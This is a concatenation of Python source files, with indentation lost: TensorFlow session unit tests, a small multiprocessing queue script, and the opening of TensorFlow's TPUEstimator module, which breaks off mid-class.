trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testOptimizedMakeCallable(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
for _ in range(3):
callable_fn = sess._make_callable_from_options(callable_opts)
for _ in range(5):
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32)))
def testOptimizedMakeCallableWithRunMetadata(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
callable_fn = sess._make_callable_from_options(callable_opts)
run_metadata = config_pb2.RunMetadata()
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32),
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
'Input to reshape is a tensor with 4 values, '
'but the requested shape has 21'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.cached_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
# Passing the config to the server, but not the session should still result
# in logging device placement.
config = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/job:local/replica:0/task:0/device:CPU:0' in str(log),
str(log))
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
def testAutoConvertAndCheckData(self):
with self.cached_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegexp(
TypeError, 'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
if __name__ == '__main__':
googletest.main()
|
queue_test.py
|
import multiprocessing as mp
import time
import random
random.seed()
def AppendFIFO(list, value, max_values):
list.append(value)
while len(list) > max_values:
list.pop(0)
return list
def send_slow(queue1, queue2):
somelist = []
maxlen = 500
sequence = 0
while True:
queue1.put((time.time(), sequence))
sequence += 1
sleeptime = random.random() * 0.01
time.sleep(sleeptime)
while queue2.empty() == False:
val, val2 = queue2.get()
somelist = AppendFIFO(somelist, val, maxlen)
del(val2)
if sequence % 200 == 0:
print("Queue2: {}".format(val))
def send_fast(queue1, queue2):
sequence = 0
while True:
queue2.put((time.time(), sequence))
sequence += 1
sleeptime = random.random() * 0.0001
time.sleep(sleeptime)
while queue1.empty() == False:
val = queue1.get()
del(val)
#print("Queue1: {}".format(queue1.get()))
send_queue = mp.Queue()
receive_queue = mp.Queue()
proc = mp.Process(target=send_fast, args=(send_queue, receive_queue,))
proc.start()
send_slow(send_queue, receive_queue)
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import error_handling
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = list(training_hooks or [])
evaluation_hooks = list(evaluation_hooks or [])
prediction_hooks = list(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
hooks = list(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
